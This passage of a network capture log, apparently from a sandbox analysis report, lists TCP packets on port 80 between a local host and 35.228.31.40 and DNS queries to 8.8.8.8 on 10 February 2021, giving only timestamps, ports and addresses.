Feb 10, 2021 15:15:45.940366030 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.940422058 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942486048 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942553997 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942559958 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942605019 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942608118 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942656994 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942665100 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942718983 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942720890 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942766905 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942775011 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942822933 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942830086 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942876101 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942878008 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942920923 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942922115 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.942979097 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.942995071 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.943026066 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.943037987 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.943084955 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.944755077 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.944830894 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.945595026 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.945681095 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.976833105 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976857901 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976871014 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976890087 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976907015 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976923943 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.976986885 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.977037907 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.977991104 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.978106022 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.982883930 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.982922077 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.982945919 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.982969046 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.982996941 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983017921 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983051062 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983083963 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983120918 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983141899 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983146906 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983172894 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983175039 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983195066 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983197927 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983218908 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983222008 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983242035 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983248949 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983268976 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983275890 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983289003 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983304977 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983325958 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983330965 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983347893 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983355999 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:45.983369112 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:45.983403921 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:46.010803938 CET	49759	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:46.086215973 CET	80	49759	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:46.119317055 CET	49758	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:46.207628965 CET	80	49758	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:46.207751989 CET	49758	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:46.237814903 CET	49758	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:46.315380096 CET	80	49758	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:48.692702055 CET	49760	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:48.692759037 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:48.770180941 CET	80	49761	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:48.770817995 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:48.771040916 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:48.773134947 CET	80	49760	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:48.773384094 CET	49760	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:48.891050100 CET	80	49761	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:49.143320084 CET	80	49761	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:49.143363953 CET	80	49761	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:49.143433094 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:49.143471003 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:49.150615931 CET	49761	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:15:49.229938030 CET	80	49761	35.228.31.40	192.168.2.7
Feb 10, 2021 15:15:50.203329086 CET	49760	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.423227072 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.497760057 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.498055935 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.524250031 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.610505104 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610532045 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610548973 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610565901 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610582113 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610599041 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610615015 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610626936 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.610635042 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610660076 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.610682964 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.610707045 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.610728979 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.611026049 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.686885118 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686914921 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686932087 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686949015 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686965942 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686981916 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.686985970 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.686999083 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687016964 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687019110 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687036991 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687056065 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687072039 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687073946 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687088966 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687104940 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687105894 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687122107 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687127113 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687155962 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687428951 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687449932 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687467098 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687483072 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687500000 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687520027 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.687536955 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.687567949 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761640072 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761673927 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761693001 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761708975 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761724949 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761730909 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761744022 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761763096 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761770010 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761780977 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761790991 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761799097 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761820078 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761822939 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761838913 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761854887 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761856079 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761873007 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761890888 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761908054 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761909962 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761925936 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761938095 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761945009 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761965990 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.761977911 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.761984110 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762001991 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762008905 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762020111 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762037039 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762048960 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762053013 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762072086 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762078047 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762089968 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762110949 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762110949 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762130976 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762147903 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762164116 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762166023 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762181997 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762195110 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762198925 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762216091 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762224913 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762233019 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762253046 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762257099 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762270927 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762289047 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762304068 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762305021 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762324095 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762336016 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762340069 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762357950 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.762367010 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.762401104 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.836954117 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.836982965 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837001085 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837013006 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837027073 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837044954 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837064981 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837081909 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837099075 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837120056 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837140083 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837156057 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837173939 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837192059 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837208986 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837227106 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837244987 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837265968 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837285042 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837302923 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837320089 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837337971 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837354898 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837372065 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837412119 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837430954 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837450027 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837469101 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837486982 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837503910 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837517023 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837529898 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837548971 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837564945 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:10.837589025 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.837646961 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.837666035 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.838073969 CET	49762	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:10.912646055 CET	80	49762	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:14.487124920 CET	49763	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:14.566494942 CET	80	49763	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:14.566740990 CET	49763	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:14.566945076 CET	49763	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:14.687175035 CET	80	49763	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:15.167987108 CET	80	49763	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:15.168068886 CET	49763	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:15.169189930 CET	49763	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:15.246279001 CET	80	49763	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:16.512337923 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:16.591650963 CET	80	49764	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:16.592425108 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:16.592622042 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:16.592643976 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:16.669565916 CET	80	49764	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:16.669604063 CET	80	49764	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.122422934 CET	80	49764	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.123456001 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.123658895 CET	49764	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.188843012 CET	49765	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.201544046 CET	80	49764	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.263645887 CET	80	49765	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.263900995 CET	49765	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.264029980 CET	49765	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.379333973 CET	80	49765	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.623415947 CET	80	49765	35.228.31.40	192.168.2.7
Feb 10, 2021 15:16:17.623548985 CET	49765	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.623625040 CET	49765	80	192.168.2.7	35.228.31.40
Feb 10, 2021 15:16:17.698412895 CET	80	49765	35.228.31.40	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2021 15:13:49.652070045 CET	59762	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:49.702563047 CET	53	59762	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:50.811459064 CET	54329	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:50.869975090 CET	53	54329	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:52.083573103 CET	58052	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:52.133831024 CET	53	58052	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:53.234210968 CET	54008	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:53.283061981 CET	53	54008	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:54.596215010 CET	59451	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:54.649353027 CET	53	59451	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:56.392698050 CET	52914	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:56.442547083 CET	53	52914	8.8.8.8	192.168.2.7
Feb 10, 2021 15:13:58.953134060 CET	64569	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:13:59.001775980 CET	53	64569	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:00.093838930 CET	52816	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:00.153899908 CET	53	52816	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:01.123405933 CET	50781	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:01.175026894 CET	53	50781	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:02.264497042 CET	54230	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:02.318202019 CET	53	54230	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:03.700726986 CET	54911	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:03.749423027 CET	53	54911	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:05.865025997 CET	49958	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:05.913882971 CET	53	49958	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:08.312998056 CET	50860	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:08.377372026 CET	53	50860	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:17.568866968 CET	50452	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:17.630748034 CET	53	50452	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:18.863126993 CET	59730	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:18.914267063 CET	53	59730	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:20.341684103 CET	59310	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:20.395224094 CET	53	59310	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:21.406733990 CET	51919	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:21.455353022 CET	53	51919	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:24.958525896 CET	64296	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:25.007149935 CET	53	64296	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:33.885106087 CET	56680	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:33.943607092 CET	53	56680	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:38.643295050 CET	58820	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:38.695013046 CET	53	58820	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:39.806226015 CET	60983	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:39.875431061 CET	53	60983	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:42.050301075 CET	49247	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:42.098851919 CET	53	49247	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:47.042896986 CET	52286	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:47.093307018 CET	53	52286	8.8.8.8	192.168.2.7
Feb 10, 2021 15:14:54.199312925 CET	56064	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:14:54.260730982 CET	53	56064	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:13.947529078 CET	63744	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:13.999607086 CET	61457	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:14.024338007 CET	53	63744	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:14.064687967 CET	53	61457	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:14.105293989 CET	58367	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:14.180802107 CET	53	58367	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:21.850204945 CET	60599	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:21.907396078 CET	53	60599	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:22.573805094 CET	59571	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:22.630867004 CET	53	59571	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:23.514405012 CET	52689	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:23.571877956 CET	53	52689	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:23.775295019 CET	50290	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:23.852691889 CET	53	50290	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:24.125828028 CET	60427	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:24.192775965 CET	53	60427	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:24.725378990 CET	56209	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:24.774223089 CET	53	56209	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:25.464097977 CET	59582	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:25.521266937 CET	53	59582	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:26.559375048 CET	60949	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:26.613106966 CET	53	60949	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:27.492147923 CET	58542	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:27.550031900 CET	53	58542	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:28.592166901 CET	59179	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:28.641925097 CET	53	59179	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:29.088866949 CET	60927	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:29.137419939 CET	53	60927	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:38.227042913 CET	57854	53	192.168.2.7	8.8.8.8
